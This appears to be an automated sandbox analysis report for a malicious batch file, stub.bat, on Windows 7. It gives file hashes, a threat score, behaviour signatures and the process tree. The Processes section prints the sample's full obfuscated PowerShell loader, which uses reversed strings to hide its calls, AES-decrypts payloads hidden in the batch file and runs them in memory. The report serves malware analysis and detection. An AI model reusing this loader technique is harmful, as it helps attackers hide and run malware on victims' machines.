Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
18-10-2024 17:12
Static task
static1
Behavioral task
behavioral1
Sample
stub.bat
Resource
win7-20240903-en
windows7-x64
5 signatures
150 seconds
General
-
Target
stub.bat
-
Size
257KB
-
MD5
192df095e220a68594056863421831b0
-
SHA1
331e2fa042bdfe106939ef51aed189bcacc56779
-
SHA256
a636e320333aa10ae6dfc2a18feedb06ca11fff33fbdcf4c6d535422275c8149
-
SHA512
ef1f5d579324ae2e5629ac22d7c5d15d022c5455e93da8ac727da4d3aae4b9c17e0edcad2e6fe2b63a06f88dffbfd8df27db7fef287f26d41418b452eb221378
-
SSDEEP
3072:MgIX3vJ9uIgVvEcPPJ2WeutPPYd0V6764o2CHZhPM8Kci/rm:MgYv3gVvvp2mISg78HTMx/rm
Score
7/10
Malware Config
Signatures
-
Deletes itself 1 IoCs
pid Process 2168 cmd.exe -
pid Process 2512 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2512 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2512 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2168 wrote to memory of 2512 2168 cmd.exe 31 PID 2168 wrote to memory of 2512 2168 cmd.exe 31 PID 2168 wrote to memory of 2512 2168 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\stub.bat"1⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:2168 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S+hmuoVda8BWME8yLmZZKXTSyvWFoMlikBXuCoYuiPc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wtRzFSQM1SqfOLu7Qbnusg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $nxqfn=New-Object System.IO.MemoryStream(,$param_var); $lrckP=New-Object System.IO.MemoryStream; $CanxX=New-Object System.IO.Compression.GZipStream($nxqfn, [IO.Compression.CompressionMode]::Decompress); $CanxX.CopyTo($lrckP); $CanxX.Dispose(); $nxqfn.Dispose(); $lrckP.Dispose(); $lrckP.ToArray();}function execute_function($param_var,$param2_var){ $odOdG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rWFbP=$odOdG.EntryPoint; $rWFbP.Invoke($null, $param2_var);}$CphvX = 'C:\Users\Admin\AppData\Local\Temp\stub.bat';$host.UI.RawUI.WindowTitle = $CphvX;$wqkCO=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($CphvX).Split([Environment]::NewLine);foreach ($ePOCw in $wqkCO) { if ($ePOCw.StartsWith(':: ')) { $kiKqU=$ePOCw.Substring(3); break; }}$payloads_var=[string[]]$kiKqU.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2512
-